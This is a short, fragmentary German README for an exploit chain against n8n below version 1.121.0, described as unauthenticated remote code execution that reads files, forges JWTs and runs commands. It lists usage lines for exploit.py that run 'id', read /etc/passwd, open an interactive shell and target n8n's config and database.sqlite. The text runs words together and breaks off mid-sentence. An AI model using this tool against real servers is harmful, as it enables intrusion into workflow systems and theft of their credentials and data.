
Exploit-Kette für nicht authentifizierte Remote-Codeausführung in n8n, die Content-Type-Verwirrung und Ausdrucksinjektion kombiniert, um Dateien zu lesen, JWTs zu fälschen und Befehle auszuführen.
Unauthentifizierte RCE-Kette für n8n < 1.121.0 (CVSS 10.0)
/home/node/.n8n/config und database.sqlite lesenchild_process ausführen# Befehl ausführen
python3 exploit.py http://target:5678 /form/test --cmd "id"
# Datei lesen
python3 exploit.py http://target:5678 /form/test --read /etc/passwd
# Interaktive Shell
python3 exploit.py http://target:5678 /form/test
Das Ziel muss einen aktiven Workflow mit Folgendem haben: